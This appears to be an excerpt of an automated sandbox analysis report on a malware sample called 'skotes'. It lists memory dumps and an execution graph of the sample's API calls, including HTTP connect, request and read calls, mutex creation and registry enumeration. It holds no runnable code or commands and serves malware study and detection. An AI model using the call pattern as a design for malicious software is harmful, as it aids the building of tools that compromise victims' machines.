                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___free_lconv_mon
                                                                                                                                              • String ID: 8"F$`'F
                                                                                                                                              • API String ID: 3903695350-3117062166
                                                                                                                                              • Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                                                                                                                                              • Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
                                                                                                                                              • Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                                                                                                                                              • Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:1089
                                                                                                                                              Total number of Limit Nodes:103
                                                                                                                                              execution_graph 34657 416d00 CreateThread 34658 416d20 Sleep 34657->34658 34659 416c70 34657->34659 34658->34658 34663 416ca0 34659->34663 34660 405c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 34660->34663 34661 417a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 34661->34663 34663->34660 34663->34661 34664 4147b0 34663->34664 34665 4147eb 34664->34665 34666 414ee3 Concurrency::details::ResourceManager::Release 34664->34666 34665->34666 34774 417a00 34665->34774 34667 414f59 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 34666->34667 34670 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34666->34670 34667->34663 34669 41480c 34788 405c10 34669->34788 34672 414fba 34670->34672 34673 414813 34674 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34673->34674 34675 414825 34674->34675 34676 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34675->34676 34677 414837 34676->34677 34800 40be30 34677->34800 34679 414843 34680 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34679->34680 34681 414858 34680->34681 34682 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34681->34682 34683 414870 34682->34683 34684 405c10 5 API calls 34683->34684 34685 414877 34684->34685 34828 408580 34685->34828 34687 414883 34688 414afd 34687->34688 34689 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34687->34689 34690 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34688->34690 34745 414f9c 34688->34745 34692 41489f 34689->34692 34691 414b2f 34690->34691 34694 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34691->34694 34693 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34692->34693 34695 4148b7 34693->34695 34696 414b44 34694->34696 34697 405c10 5 API calls 34695->34697 34698 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34696->34698 34699 4148be 34697->34699 34700 414b56 34698->34700 34701 408580 2 API calls 34699->34701 34702 40be30 12 API calls 34700->34702 34703 4148ca 34701->34703 34704 414b62 34702->34704 34703->34688 34706 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34703->34706 34705 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34704->34705 34707 414b77 34705->34707 34708 4148e7 34706->34708 34709 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34707->34709 34710 405c10 5 API calls 34708->34710 34711 414b8f 34709->34711 34714 4148ef 34710->34714 34712 405c10 5 API calls 34711->34712 34713 414b96 34712->34713 34715 408580 2 API calls 34713->34715 34717 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34714->34717 34716 414ba2 34715->34716 34718 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34716->34718 34721 414e70 Concurrency::details::ResourceManager::Release 34716->34721 34727 414959 Concurrency::details::ResourceManager::Release 34717->34727 34719 414bbe 34718->34719 34720 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34719->34720 34722 414bd6 34720->34722 34721->34666 34723 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34721->34723 34724 405c10 5 API calls 34722->34724 34723->34666 34726 414bdd 34724->34726 34725 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34728 4149e6 34725->34728 34730 408580 2 API calls 34726->34730 34727->34725 34729 405c10 5 API calls 34728->34729 34733 4149ee 34729->34733 34731 414be9 34730->34731 34731->34721 34732 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34731->34732 34734 414c06 34732->34734 34735 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34733->34735 34736 405c10 5 API calls 34734->34736 34740 414a49 Concurrency::details::ResourceManager::Release 34735->34740 34737 414c0e 34736->34737 34738 414f97 34737->34738 34739 414c5a 34737->34739 34885 418200 RtlAllocateHeap RtlAllocateHeap 34738->34885 34837 4180c0 34739->34837 34740->34688 34870 4098f0 34740->34870 34744 414ad5 34744->34688 34878 4375f6 34744->34878 34886 41c1d9 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task std::invalid_argument::invalid_argument 34745->34886 34748 414fa6 34887 436c6a 34748->34887 34750 414cec Concurrency::details::ResourceManager::Release 34751 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34750->34751 34755 414d05 34751->34755 34753 414c78 Concurrency::details::ResourceManager::Release 34753->34748 34753->34750 34757 405c10 5 API calls 34755->34757 34756 414fab 34758 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34756->34758 34759 414d0d 34757->34759 34758->34721 34760 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34759->34760 34762 414d68 Concurrency::details::ResourceManager::Release 34760->34762 34761 414ddc Concurrency::details::ResourceManager::Release 34763 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34761->34763 34762->34756 34762->34761 34764 414df7 34763->34764 34765 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34764->34765 34766 414e0c 34765->34766 34767 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34766->34767 34768 414e27 34767->34768 34769 405c10 5 API calls 34768->34769 34770 414e2e 34769->34770 34771 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34770->34771 34772 414e67 34771->34772 34852 414390 34772->34852 34775 417a26 34774->34775 34776 417a2d 34775->34776 34777 417a81 34775->34777 34778 417a62 34775->34778 34776->34669 34783 41d3e2 ListArray 2 API calls 34777->34783 34786 417a76 std::_Rethrow_future_exception 34777->34786 34779 417ab9 34778->34779 34780 417a69 34778->34780 34898 402480 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback 34779->34898 34890 41d3e2 34780->34890 34783->34786 34784 417a6f 34785 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34784->34785 34784->34786 34787 417ac3 __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 34785->34787 34786->34669 34787->34669 34906 405940 34788->34906 34792 405c6a 34930 404b30 34792->34930 34794 405c7b Concurrency::details::ResourceManager::Release 34796 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34794->34796 34797 405ce7 Concurrency::details::ResourceManager::Release 34794->34797 34795 405d17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 34795->34673 34796->34797 34797->34795 34798 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34797->34798 34799 405d47 34798->34799 34801 40c281 34800->34801 34802 40be82 34800->34802 34803 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34801->34803 34802->34801 34804 40be96 Sleep InternetOpenW InternetConnectA 34802->34804 34810 40c22e Concurrency::details::ResourceManager::Release 34803->34810 34805 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34804->34805 34806 40bf18 34805->34806 34808 405c10 5 API calls 34806->34808 34807 40c27c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 34807->34679 34811 40bf23 HttpOpenRequestA 34808->34811 34809 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34812 40c354 34809->34812 34810->34807 34810->34809 34814 40bf4c Concurrency::details::ResourceManager::Release 34811->34814 34815 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34814->34815 34816 40bfb4 34815->34816 34817 405c10 5 API calls 34816->34817 34818 40bfbf 34817->34818 34819 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34818->34819 34820 40bfd8 34819->34820 34821 405c10 5 API calls 34820->34821 34822 40bfe3 HttpSendRequestA 34821->34822 34824 40c006 Concurrency::details::ResourceManager::Release 34822->34824 34825 40c08e InternetReadFile 34824->34825 34826 40c0b5 __InternalCxxFrameHandler 34825->34826 34827 40c13f InternetReadFile 34826->34827 34827->34826 34832 4086a0 Concurrency::details::ResourceManager::Release 34828->34832 34836 4085d5 Concurrency::details::ResourceManager::Release 34828->34836 34829 408767 34944 418200 RtlAllocateHeap RtlAllocateHeap 34829->34944 34830 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34830->34836 34833 408740 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 34832->34833 34834 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34832->34834 34833->34687 34835 408771 34834->34835 34836->34829 34836->34830 34836->34832 34840 418104 34837->34840 34842 4180de __InternalCxxFrameHandler 34837->34842 34838 4181ee 34945 419270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 34838->34945 34840->34838 34844 418158 34840->34844 34845 41817d 34840->34845 34841 4181f3 34946 402480 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback 34841->34946 34842->34753 34844->34841 34847 41d3e2 ListArray 2 API calls 34844->34847 34848 41d3e2 ListArray 2 API calls 34845->34848 34850 418169 std::_Rethrow_future_exception 34845->34850 34846 4181f8 34847->34850 34848->34850 34849 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34849->34838 34850->34849 34851 4181d0 Concurrency::details::ResourceManager::Release 34850->34851 34851->34753 34853 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34852->34853 34854 4143d2 34853->34854 34855 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34854->34855 34856 4143e4 34855->34856 34857 408580 2 API calls 34856->34857 34858 4143ed 34857->34858 34859 414646 34858->34859 34869 4143f8 Concurrency::details::ResourceManager::Release 34858->34869 34860 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34859->34860 34861 414657 34860->34861 34862 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34861->34862 34863 41466c 34862->34863 34864 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34863->34864 34865 414610 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 34864->34865 34865->34721 34867 4180c0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 34867->34869 34868 417a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 34868->34869 34869->34865 34869->34867 34869->34868 34947 419280 34869->34947 34871 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34870->34871 34872 40991e 34871->34872 34873 405c10 5 API calls 34872->34873 34875 409927 ListArray 34873->34875 34874 4099c6 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 34874->34744 34875->34874 34876 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34875->34876 34877 4099f2 34876->34877 34953 43a7c8 RtlAllocateHeap _unexpected __freea 34878->34953 34880 414ade 34881 438ab6 34880->34881 34882 438ad1 34881->34882 34954 438868 34882->34954 34886->34748 34995 436bf6 RtlAllocateHeap __dosmaperr ___std_exception_copy 34887->34995 34889 436c79 ___std_exception_copy 34893 41d3e7 ListArray 34890->34893 34892 41d401 34892->34784 34893->34892 34894 402480 Concurrency::cancel_current_task Concurrency::details::_CancellationTokenState::_RegisterCallback 34893->34894 34899 438be1 34893->34899 34895 41d40d Concurrency::cancel_current_task Concurrency::details::ResourceManager::ResourceManager 34894->34895 34905 4338af RtlAllocateHeap RtlAllocateHeap ___std_exception_destroy ___std_exception_copy 34894->34905 34897 4024c3 34897->34784 34898->34784 34903 43b04b ListArray _unexpected 34899->34903 34900 43b089 34901 4375f6 __dosmaperr RtlAllocateHeap 34900->34901 34904 43b087 34901->34904 34902 43b074 RtlAllocateHeap 34902->34903 34902->34904 34903->34900 34903->34902 34904->34893 34905->34897 34937 417f80 RtlAllocateHeap RtlAllocateHeap ListArray Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 34906->34937 34908 40596b 34909 4059e0 34908->34909 34938 417f80 RtlAllocateHeap RtlAllocateHeap ListArray Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 34909->34938 34911 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34923 405a45 34911->34923 34912 405c09 34940 418200 RtlAllocateHeap RtlAllocateHeap 34912->34940 34913 405bdd __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 34913->34792 34915 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34915->34923 34923->34911 34923->34912 34923->34913 34923->34915 34939 405730 RtlAllocateHeap RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 34923->34939 34931 404dc2 34930->34931 34935 404b92 34930->34935 34931->34794 34933 404ce5 34933->34931 34943 418ca0 2 API calls 4 library calls 34933->34943 34935->34933 34941 436da6 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap __fassign 34935->34941 34942 418ca0 2 API calls 4 library calls 34935->34942 34937->34908 34938->34923 34939->34923 34941->34935 34942->34935 34943->34933 34946->34846 34948 419294 34947->34948 34951 4192a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 34948->34951 34952 4194e0 2 API calls 4 library calls 34948->34952 34950 41932b 34950->34869 34951->34869 34952->34950 34953->34880 34972 43868d 34954->34972 34956 4388b3 34980 43690a 34956->34980 34958 43887a 34958->34956 34959 43888f 34958->34959 34971 43889f 34958->34971 34960 4375f6 __dosmaperr RtlAllocateHeap 34959->34960 34961 438894 34960->34961 34979 436c5a RtlAllocateHeap ___std_exception_copy 34961->34979 34964 4388bf 34965 4388ee 34964->34965 34988 436d52 4 API calls 2 library calls 34964->34988 34968 438958 34965->34968 34989 438a8d RtlAllocateHeap __dosmaperr ___std_exception_copy 34965->34989 34990 438a8d RtlAllocateHeap __dosmaperr ___std_exception_copy 34968->34990 34969 438a20 34970 4375f6 __dosmaperr RtlAllocateHeap 34969->34970 34969->34971 34970->34971 34971->34688 34973 438692 34972->34973 34974 4386a5 34972->34974 34975 4375f6 __dosmaperr RtlAllocateHeap 34973->34975 34974->34958 34976 438697 34975->34976 34991 436c5a RtlAllocateHeap ___std_exception_copy 34976->34991 34978 4386a2 34978->34958 34979->34971 34981 43692a 34980->34981 34987 436921 34980->34987 34981->34987 34992 43a671 3 API calls 3 library calls 34981->34992 34983 43694a 34993 43b5fb GetPEB GetPEB RtlAllocateHeap __fassign 34983->34993 34985 436960 34994 43b628 GetPEB GetPEB RtlAllocateHeap __fassign 34985->34994 34987->34964 34988->34964 34989->34968 34990->34969 34991->34978 34992->34983 34993->34985 34994->34987 34995->34889 34996 40a682 GetFileAttributesA 34997 40a692 Concurrency::details::ResourceManager::Release 34996->34997 34998 40a75d Concurrency::details::ResourceManager::Release 34997->34998 34999 40a949 34997->34999 35004 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34998->35004 35000 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34999->35000 35001 40a94e 35000->35001 35002 40a953 Sleep CreateMutexA 35001->35002 35003 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35001->35003 35008 40a98e 35002->35008 35003->35002 35005 40a903 35004->35005 35007 40a9a7 35008->35007 35011 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35008->35011 35010 40a9b0 35011->35010 35012 41d762 35013 41d76e ___scrt_is_nonwritable_in_current_image 35012->35013 35033 41d488 35013->35033 35015 41d8ce ___scrt_fastfail 35054 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35015->35054 35017 41d8db 35055 4365ed GetPEB GetPEB RtlAllocateHeap _unexpected 35017->35055 35019 41d8e3 ___security_init_cookie 35020 41d8e9 __scrt_common_main_seh 35019->35020 35021 41d83f 35037 4395bc 35021->35037 35023 41d775 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 35023->35015 35023->35021 35032 41d7be 35023->35032 35053 436603 3 API calls 3 library calls 35023->35053 35025 41d845 35041 416d30 35025->35041 35034 41d491 35033->35034 35036 41d4a6 ___scrt_uninitialize_crt 35034->35036 35056 439a28 35034->35056 35036->35023 35038 4395c5 35037->35038 35039 4395ca 35037->35039 35090 439320 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 35038->35090 35039->35025 35091 40a960 Sleep CreateMutexA 35041->35091 35045 416d45 35046 40d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 35045->35046 35047 416d4a 35046->35047 35048 414fc0 7 API calls 35047->35048 35049 416d4f 35048->35049 35050 406020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 35049->35050 35051 416d54 35050->35051 35052 406020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 35051->35052 35052->35051 35053->35021 35054->35017 35055->35019 35059 43ee7e 35056->35059 35060 439a37 35059->35060 35061 43ee8e 35059->35061 35060->35036 35061->35060 35063 43c54b 35061->35063 35064 43c557 ___scrt_is_nonwritable_in_current_image _unexpected 35063->35064 35069 43bdc4 35064->35069 35066 43c56d 35068 43c577 35066->35068 35078 43c3e1 RtlAllocateHeap 35066->35078 35068->35061 35070 43bdd0 ___scrt_is_nonwritable_in_current_image 35069->35070 35071 43bdfa _unexpected 35070->35071 35072 43bdd9 35070->35072 35076 43bde8 35071->35076 35079 43bd14 35071->35079 35073 4375f6 __dosmaperr RtlAllocateHeap 35072->35073 35074 43bdde 35073->35074 35084 436c5a RtlAllocateHeap ___std_exception_copy 35074->35084 35076->35066 35078->35068 35085 43d82f 35079->35085 35081 43bd26 __wsopen_s 35089 43adf5 RtlAllocateHeap __dosmaperr 35081->35089 35083 43bd88 35083->35071 35084->35076 35088 43d83c ListArray _unexpected 35085->35088 35086 43d867 RtlAllocateHeap 35087 43d87a __dosmaperr 35086->35087 35086->35088 35087->35081 35088->35086 35088->35087 35089->35083 35090->35039 35093 40a98e 35091->35093 35092 40a9a7 35096 40ce40 35092->35096 35093->35092 35101 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35093->35101 35095 40a9b0 35097 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35096->35097 35098 40ce92 35097->35098 35099 405c10 5 API calls 35098->35099 35100 40ce9d 35099->35100 35101->35095 35130 409ba5 GetFileAttributesA 35131 409bb5 Concurrency::details::ResourceManager::Release 35130->35131 35132 40a91c 35131->35132 35135 409c80 Concurrency::details::ResourceManager::Release 35131->35135 35133 40a953 Sleep CreateMutexA 35132->35133 35134 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35132->35134 35140 40a98e 35133->35140 35134->35133 35137 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35135->35137 35138 40a903 35137->35138 35139 40a9a7 35140->35139 35143 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35140->35143 35142 40a9b0 35143->35142 35144 43c1c4 35145 43c367 35144->35145 35147 43c1ee 35144->35147 35146 4375f6 __dosmaperr RtlAllocateHeap 35145->35146 35148 43c352 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z ___std_exception_copy 35146->35148 35147->35145 35149 43c239 35147->35149 35157 442139 RtlAllocateHeap __dosmaperr ___std_exception_copy 35149->35157 35151 43c26d 35151->35148 35158 442165 RtlAllocateHeap __dosmaperr ___std_exception_copy 35151->35158 35153 43c27f 35153->35148 35159 442191 35153->35159 35155 43c291 35155->35148 35166 442988 RtlAllocateHeap ___scrt_is_nonwritable_in_current_image _unexpected 35155->35166 35157->35151 35158->35153 35160 4421b2 35159->35160 35161 44219d 35159->35161 35160->35155 35162 4375f6 __dosmaperr RtlAllocateHeap 35161->35162 35163 4421a2 35162->35163 35167 436c5a RtlAllocateHeap ___std_exception_copy 35163->35167 35165 4421ad 35165->35155 35166->35148 35167->35165 35168 40a54d GetFileAttributesA 35169 40a55d Concurrency::details::ResourceManager::Release 35168->35169 35170 40a628 Concurrency::details::ResourceManager::Release 35169->35170 35171 40a944 35169->35171 35174 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35170->35174 35172 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35171->35172 35173 40a949 35172->35173 35175 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35173->35175 35176 40a903 35174->35176 35177 40a94e 35175->35177 35178 40a953 Sleep CreateMutexA 35177->35178 35179 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35177->35179 35182 40a98e 35178->35182 35179->35178 35181 40a9a7 35182->35181 35185 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35182->35185 35184 40a9b0 35185->35184 35186 40e62d 35187 40e63b 35186->35187 35193 40e64f Concurrency::details::ResourceManager::Release 35186->35193 35188 40eab3 35187->35188 35187->35193 35189 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35188->35189 35224 40e83e 35188->35224 35189->35224 35190 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35191 40eabd 35190->35191 35192 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35191->35192 35194 40eac2 35192->35194 35196 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35193->35196 35195 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35194->35195 35197 40eb19 35195->35197 35198 40e7cb 35196->35198 35199 405c10 5 API calls 35197->35199 35200 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35198->35200 35201 40eb21 35199->35201 35202 40e7e0 35200->35202 35328 4183c0 35201->35328 35204 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35202->35204 35205 40e7f2 35204->35205 35207 40be30 12 API calls 35205->35207 35206 40eb36 35336 418220 